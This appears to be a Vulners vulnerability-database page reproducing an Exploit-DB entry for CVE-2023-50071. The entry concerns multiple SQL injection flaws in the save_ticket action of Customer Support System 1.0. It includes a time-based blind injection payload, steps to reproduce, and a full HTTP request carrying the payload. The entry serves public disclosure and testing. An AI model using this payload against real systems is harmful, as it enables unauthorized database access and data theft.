Vulners
Lucene search
Customer Support System 1.0 - Multiple SQL injection Vulnerability
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | Customer Support System 1.0 SQL Injection Vulnerability | 6 Mar 202400:00 | – | zdt |
 | Exploit for SQL Injection in Customer_Support_System_Project Customer_Support_System | 16 Dec 202323:06 | – | githubexploit |
 | CVE-2023-50071 | 29 Dec 202322:15 | – | attackerkb |
 | CVE-2023-50071 | 17 Dec 202307:25 | – | circl |
 | Customer Support System Security Breach | 29 Dec 202300:00 | – | cnnvd |
 | CVE-2023-50071 | 29 Dec 202300:00 | – | cve |
 | CVE-2023-50071 | 29 Dec 202300:00 | – | cvelist |
 | CVE-2023-50071 - Multiple SQL Injection | 6 Mar 202400:00 | – | exploitdb |
 | CVE-2023-50071 | 29 Dec 202322:15 | – | nvd |
 | CVE-2023-50071 | 29 Dec 202322:15 | – | osv |
10
# Exploit Title: Customer Support System 1.0 - Multiple SQL injection
vulnerabilities
# Exploit Author: Geraldo Alcantara
# Vendor Homepage:
https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
# Software Link:
https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Windows
# CVE : CVE-2023-50071
*Description*: Multiple SQL injection vulnerabilities in
/customer_support/ajax.php?action=save_ticket in Customer Support
System 1.0 allow authenticated attackers to execute arbitrary SQL
commands via department_id, customer_id and subject.*Payload*:
'+(select*from(select(sleep(20)))a)+'
*Steps to reproduce*:
1- Log in to the application.
2- Navigate to the page /customer_support/index.php?page=new_ticket.
3- Create a new ticket and insert a malicious payload into one of the
following parameters: department_id, customer_id, or subject.
*Request:*
POST /customer_support/ajax.php?action=save_ticket HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0)
Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------81419250823331111993422505835
Content-Length: 853
Origin: http://192.168.68.148
Connection: close
Referer: http://192.168.68.148/customer_support/index.php?page=new_ticket
Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko;
sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq;
PHPSESSID=mfd30tu0h0s43s7kdjb74fcu0l
-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="id"
-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="subject"
teste'+(select*from(select(sleep(5)))a)+'
-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="customer_id"
3
-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="department_id"
4
-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="description"
<p>Blahs<br></p>
-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream
-----------------------------81419250823331111993422505835--
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Mar 2024 00:00Current
8.9High risk
Vulners AI Score8.9
CVSS 3.18.8
EPSS0.13754
SSVC